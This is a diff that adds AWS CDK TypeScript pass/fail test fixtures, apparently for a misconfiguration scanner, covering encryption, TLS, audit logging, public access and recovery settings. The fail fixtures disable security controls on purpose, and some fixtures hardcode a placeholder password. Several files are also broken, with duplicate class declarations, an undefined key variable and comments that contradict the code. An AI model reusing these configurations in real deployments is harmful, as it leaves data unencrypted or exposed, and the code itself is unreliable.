+
+    // Create a CloudTrail trail with the specified KMS key ID
+    const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+      enableLogFileValidation: true,
+      includeGlobalServiceEvents: true,
+      isMultiRegionTrail: true,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts b/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts
new file mode 100644
index 00000000000..82136544633
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailEncryption/pass.ts
@@ -0,0 +1,45 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+    // Create a CloudTrail trail with the specified KMS key ID
+    const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+      enableLogFileValidation: true,
+      includeGlobalServiceEvents: true,
+      isMultiRegionTrail: true,
+      kmsKeyId: kmsKey.keyId, // Use the KMS key ID
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+
+    // Create a CloudTrail trail with the specified KMS key ID
+    const trail = new cloudtrail.CfnTrail(this, 'MyTrail', {
+      enableLogFileValidation: true,
+      includeGlobalServiceEvents: true,
+      isMultiRegionTrail: true,
+      kmsKeyId: new kms.Key(this, 'CloudTrailKmsKey').keyId,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudTrailStack(app, 'CloudTrailStack');
diff --git a/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts
new file mode 100644
index 00000000000..cff350f586d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/fail__2__.ts
@@ -0,0 +1,39 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+    // Create a CloudTrail trail using CfnTrail
+    const trail = new cloudtrail.CfnTrail(this, 'MyCfnTrail', {
+      isMultiRegionTrail: false,
+      enableLogFileValidation: true,
+      includeGlobalServiceEvents: true,
+      kmsKeyId: kmsKey.keyId,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
+
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+    // Create a CloudTrail trail using Trail construct
+    const trail = new cloudtrail.Trail(this, 'MyTrail', {
+      enableFileValidation: true,
+      includeGlobalServiceEvents: true,
+      encryptionKey: kmsKey,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
diff --git a/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts
new file mode 100644
index 00000000000..d1c76d52db8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudtrailMultiRegion/pass.ts
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudtrail from 'aws-cdk-lib/aws-cloudtrail';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+    // Create a CloudTrail trail using CfnTrail
+    const trail = new cloudtrail.CfnTrail(this, 'MyCfnTrail', {
+      isMultiRegionTrail: true,
+      enableLogFileValidation: true,
+      includeGlobalServiceEvents: true,
+      kmsKeyId: kmsKey.keyId,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
+
+
+export class CloudTrailStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CloudTrail encryption
+    const kmsKey = new kms.Key(this, 'CloudTrailKmsKey');
+
+    // Create a CloudTrail trail using Trail construct
+    const trail = new cloudtrail.Trail(this, 'MyTrail', {
+      isMultiRegionTrail: true,
+      enableFileValidation: true,
+      includeGlobalServiceEvents: true,
+      encryptionKey: kmsKey,
+      trailName: 'MyCloudTrail',
+    });
+  }
+}
diff --git a/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts
new file mode 100644
index 00000000000..6c7798657d5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/fail.ts
@@ -0,0 +1,41 @@
+import * as cdk from 'aws-cdk-lib';
+import * as codebuild from 'aws-cdk-lib/aws-codebuild';
+
+export class CodeBuildStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a CodeBuild project
+    const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+      projectName: 'MyCodeBuildProject',
+      environment: {
+        buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+        environmentVariables: {
+          'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+        },
+      },
+      buildSpec: codebuild.BuildSpec.fromObject({
+        version: '0.2',
+        phases: {
+          install: {
+            commands: [
+              'npm install',
+            ],
+          },
+          build: {
+            commands: [
+              'npm run build',
+            ],
+          },
+        },
+      }),
+    });
+
+    // Ensure that encryption is not disabled
+    project.node.addDependency(kmsKey);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
diff --git a/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts
new file mode 100644
index 00000000000..56b2204aff2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CodeBuildProjectEncryption/pass.ts
@@ -0,0 +1,86 @@
+import * as cdk from 'aws-cdk-lib';
+import * as codebuild from 'aws-cdk-lib/aws-codebuild';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class CodeBuildStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for CodeBuild encryption
+    const kmsKey = new kms.Key(this, 'CodeBuildKmsKey');
+
+    // Create a CodeBuild project
+    const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+      projectName: 'MyCodeBuildProject',
+      encryptionKey: kmsKey, // Specify the KMS key
+      environment: {
+        buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+        environmentVariables: {
+          'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+        },
+      },
+      buildSpec: codebuild.BuildSpec.fromObject({
+        version: '0.2',
+        phases: {
+          install: {
+            commands: [
+              'npm install',
+            ],
+          },
+          build: {
+            commands: [
+              'npm run build',
+            ],
+          },
+        },
+      }),
+    });
+
+    // Ensure that encryption is not disabled
+    project.node.addDependency(kmsKey);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
+
+export class CodeBuildStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a CodeBuild project
+    const project = new codebuild.Project(this, 'MyCodeBuildProject', {
+      projectName: 'MyCodeBuildProject',
+      encryptionKey: new kms.Key(this, 'CodeBuildKmsKey'), // Specify the KMS key
+      environment: {
+        buildImage: codebuild.LinuxBuildImage.STANDARD_4_0,
+        environmentVariables: {
+          'EXAMPLE_ENV_VARIABLE': { value: 'example-value' },
+        },
+      },
+      buildSpec: codebuild.BuildSpec.fromObject({
+        version: '0.2',
+        phases: {
+          install: {
+            commands: [
+              'npm install',
+            ],
+          },
+          build: {
+            commands: [
+              'npm run build',
+            ],
+          },
+        },
+      }),
+    });
+
+    // Ensure that encryption is not disabled
+    project.node.addDependency(kmsKey);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CodeBuildStack(app, 'CodeBuildStack');
diff --git a/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts
new file mode 100644
index 00000000000..d9cfe44e9d9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DAXEncryption/fail__2__.ts
@@ -0,0 +1,45 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dax from 'aws-cdk-lib/aws-dax';
+
+export class DAXClusterStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a DAX cluster
+    const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+      clusterName: 'MyDAXCluster',
+      description: 'My DAX Cluster',
+      iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+      nodeType: 'dax.r5.large',
+      replicationFactor: 2,
+      sseSpecification: {
+        enabled: false, // Disable server-side encryption
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
+
+export class DAXClusterStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a DAX cluster
+    const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+      clusterName: 'MyDAXCluster',
+      description: 'My DAX Cluster',
+      iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+      nodeType: 'dax.r5.large',
+      replicationFactor: 2,
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts b/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts
new file mode 100644
index 00000000000..5c77d837f20
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DAXEncryption/pass.ts
@@ -0,0 +1,25 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dax from 'aws-cdk-lib/aws-dax';
+
+export class DAXClusterStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a DAX cluster
+    const daxCluster = new dax.CfnCluster(this, 'MyDAXCluster', {
+      clusterName: 'MyDAXCluster',
+      description: 'My DAX Cluster',
+      iamRoleArn: 'arn:aws:iam::123456789012:role/DAXServiceRole',
+      nodeType: 'dax.r5.large',
+      replicationFactor: 2,
+      sseSpecification: {
+        enabled: true, // Enable server-side encryption
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DAXClusterStack(app, 'DAXClusterStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..e6c770fb1ec
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/fail.ts
@@ -0,0 +1,34 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dms from 'aws-cdk-lib/aws-dms';
+
+export class DMSStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a DMS replication instance
+    const replicationInstance = new dms.CfnReplicationInstance(this, 'MyCfnReplicationInstance', {
+      replicationInstanceClass: 'replicationInstanceClass',
+
+      // Optional properties
+      allocatedStorage: 123,
+      allowMajorVersionUpgrade: false,
+      autoMinorVersionUpgrade: false,
+      availabilityZone: 'availabilityZone',
+      engineVersion: 'engineVersion',
+      kmsKeyId: 'kmsKeyId',
+      multiAz: false,
+      preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+      publiclyAccessible: true, // Set publiclyAccessible to true
+      replicationInstanceIdentifier: 'replicationInstanceIdentifier',
+      replicationSubnetGroupIdentifier: 'replicationSubnetGroupIdentifier',
+      resourceIdentifier: 'resourceIdentifier',
+      tags: [{ key: 'key', value: 'value' }],
+      vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DMSStack(app, 'DMSStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..90482be05a4
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DMSReplicationInstancePubliclyAccessible/pass.ts
@@ -0,0 +1,34 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dms from 'aws-cdk-lib/aws-dms';
+
+export class DMSStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create a DMS replication instance
+    const replicationInstance = new dms.CfnReplicationInstance(this, 'MyCfnReplicationInstance', {
+      replicationInstanceClass: 'replicationInstanceClass',
+
+      // Optional properties
+      allocatedStorage: 123,
+      allowMajorVersionUpgrade: false,
+      autoMinorVersionUpgrade: false,
+      availabilityZone: 'availabilityZone',
+      engineVersion: 'engineVersion',
+      kmsKeyId: 'kmsKeyId',
+      multiAz: false,
+      preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+      publiclyAccessible: false, // Set publiclyAccessible to true
+      replicationInstanceIdentifier: 'replicationInstanceIdentifier',
+      replicationSubnetGroupIdentifier: 'replicationSubnetGroupIdentifier',
+      resourceIdentifier: 'resourceIdentifier',
+      tags: [{ key: 'key', value: 'value' }],
+      vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DMSStack(app, 'DMSStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts b/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts
new file mode 100644
index 00000000000..b9b8a56e3dc
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBAuditLogs/fail__2__.ts
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DocDB Cluster Parameter Group
+    const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+      description: 'Custom DocDB Cluster Parameter Group',
+      family: 'docdb4.0',
+      parameters: {
+        audit_logs: 'disabled',
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
+
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DocDB Cluster Parameter Group
+    const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+      description: 'Custom DocDB Cluster Parameter Group',
+      family: 'docdb4.0',
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts b/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts
new file mode 100644
index 00000000000..3d6121eecbd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBAuditLogs/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DocDB Cluster Parameter Group
+    const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+      description: 'Custom DocDB Cluster Parameter Group',
+      family: 'docdb4.0',
+      parameters: {
+        audit_logs: 'enabled',
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts
new file mode 100644
index 00000000000..134b001376c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBEncryption/fail__2__.ts
@@ -0,0 +1,55 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for DocumentDB storage encryption
+    const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+    // Create an Amazon DocumentDB cluster
+    const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+      dbClusterIdentifier: 'MyCluster',
+      masterUsername: 'admin',
+      masterUserPassword: 'mysecretpassword',
+      dbSubnetGroupName: 'MySubnetGroup',
+      engineVersion: '4.0.0',
+      storageEncrypted: false, // Enable storage encryption
+      kmsKeyId: kmsKey.keyArn,
+      vpcSecurityGroupIds: ['sg-12345678'],
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
+
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for DocumentDB storage encryption
+    const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+    // Create an Amazon DocumentDB cluster
+    const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+      dbClusterIdentifier: 'MyCluster',
+      masterUsername: 'admin',
+      masterUserPassword: 'mysecretpassword',
+      dbSubnetGroupName: 'MySubnetGroup',
+      engineVersion: '4.0.0',
+      kmsKeyId: kmsKey.keyArn,
+      vpcSecurityGroupIds: ['sg-12345678'],
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts b/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts
new file mode 100644
index 00000000000..d099a797698
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBEncryption/pass.ts
@@ -0,0 +1,29 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define a KMS key for DocumentDB storage encryption
+    const kmsKey = new kms.Key(this, 'DocDBEncryptionKey');
+
+    // Create an Amazon DocumentDB cluster
+    const cluster = new docdb.CfnDBCluster(this, 'MyCluster', {
+      dbClusterIdentifier: 'MyCluster',
+      masterUsername: 'admin',
+      masterUserPassword: 'mysecretpassword',
+      dbSubnetGroupName: 'MySubnetGroup',
+      engineVersion: '4.0.0',
+      storageEncrypted: true, // Enable storage encryption
+      kmsKeyId: kmsKey.keyArn,
+      vpcSecurityGroupIds: ['sg-12345678'],
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts b/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts
new file mode 100644
index 00000000000..6e1008df37a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBTLS/fail.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DocDB Cluster Parameter Group
+    const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+      description: 'Custom DocDB Cluster Parameter Group',
+      family: 'docdb4.0',
+      parameters: {
+        tls: 'disabled',
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts b/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts
new file mode 100644
index 00000000000..81de6abd68c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DocDBTLS/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as docdb from 'aws-cdk-lib/aws-docdb';
+
+export class DocDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DocDB Cluster Parameter Group
+    const dbParameterGroup = new docdb.CfnDBClusterParameterGroup(this, 'DocDBClusterParameterGroup', {
+      description: 'Custom DocDB Cluster Parameter Group',
+      family: 'docdb4.0',
+      parameters: {
+        tls: 'enabled',
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DocDBStack(app, 'DocDBStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts
new file mode 100644
index 00000000000..f123d647f8b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/fail.ts
@@ -0,0 +1,36 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table
+    const table = new dynamodb.CfnTable(this, 'MyTable', {
+      tableName: 'MyTable',
+      attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+      keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+      provisionedThroughput: {
+        readCapacityUnits: 5,
+        writeCapacityUnits: 5,
+      },
+    });
+
+    // Define the DynamoDB global table
+    const globalTable = new dynamodb.CfnGlobalTable(this, 'MyGlobalTable', {
+      globalTableName: 'MyGlobalTable',
+      replicationGroup: [{
+        region: 'us-east-1', // Replace with your preferred region
+      }],
+      sourceTableName: table.ref,
+      pointInTimeRecoverySpecification: {
+        pointInTimeRecoveryEnabled: false, // Enable point-in-time recovery for the global table
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts
new file mode 100644
index 00000000000..ef211c5a5ec
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodbGlobalTableRecovery/pass.ts
@@ -0,0 +1,36 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table
+    const table = new dynamodb.CfnTable(this, 'MyTable', {
+      tableName: 'MyTable',
+      attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+      keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+      provisionedThroughput: {
+        readCapacityUnits: 5,
+        writeCapacityUnits: 5,
+      },
+    });
+
+    // Define the DynamoDB global table
+    const globalTable = new dynamodb.CfnGlobalTable(this, 'MyGlobalTable', {
+      globalTableName: 'MyGlobalTable',
+      replicationGroup: [{
+        region: 'us-east-1', // Replace with your preferred region
+      }],
+      sourceTableName: table.ref,
+      pointInTimeRecoverySpecification: {
+        pointInTimeRecoveryEnabled: true, // Enable point-in-time recovery for the global table
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts b/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts
new file mode 100644
index 00000000000..488cc3e93f3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodcRecovery/fail__2__.ts
@@ -0,0 +1,51 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table
+    const table = new dynamodb.CfnTable(this, 'MyTable', {
+      tableName: 'MyTable',
+      attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+      keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+      provisionedThroughput: {
+        readCapacityUnits: 5,
+        writeCapacityUnits: 5,
+      },
+      pointInTimeRecoverySpecification: {
+        pointInTimeRecoveryEnabled: false, // disable point-in-time recovery for the table
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
+
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table with point-in-time recovery enabled
+    const table = new dynamodb.Table(this, 'MyTable', {
+      tableName: 'MyTable',
+      partitionKey: { name: 'id', type: dynamodb.AttributeType.STRING },
+      readCapacity: 5,
+      writeCapacity: 5,
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Optional: specify removal policy
+      timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery
+      pointInTimeRecovery: false, // Enable point-in-time recovery
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts b/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts
new file mode 100644
index 00000000000..f1ec4c4c0c6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts
@@ -0,0 +1,50 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table
+    const table = new dynamodb.CfnTable(this, 'MyTable', {
+      tableName: 'MyTable',
+      attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+      keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+      provisionedThroughput: {
+        readCapacityUnits: 5,
+        writeCapacityUnits: 5,
+      },
+      pointInTimeRecoverySpecification: {
+        pointInTimeRecoveryEnabled: true, // Enable point-in-time recovery for the table
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
+
+
+export class DynamoDBStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Define the DynamoDB table with point-in-time recovery enabled
+    const table = new dynamodb.Table(this, 'MyTable', {
+      tableName: 'MyTable',
+      partitionKey: { name: 'id', type: dynamodb.AttributeType.STRING },
+      readCapacity: 5,
+      writeCapacity: 5,
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Optional: specify removal policy
+      timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery
+      pointInTimeRecovery: true, // Enable point-in-time recovery
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts
new file mode 100644
index 00000000000..6cebaf4e5b1
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts
@@ -0,0 +1,66 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+
+export class EC2Stack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create an EC2 instance
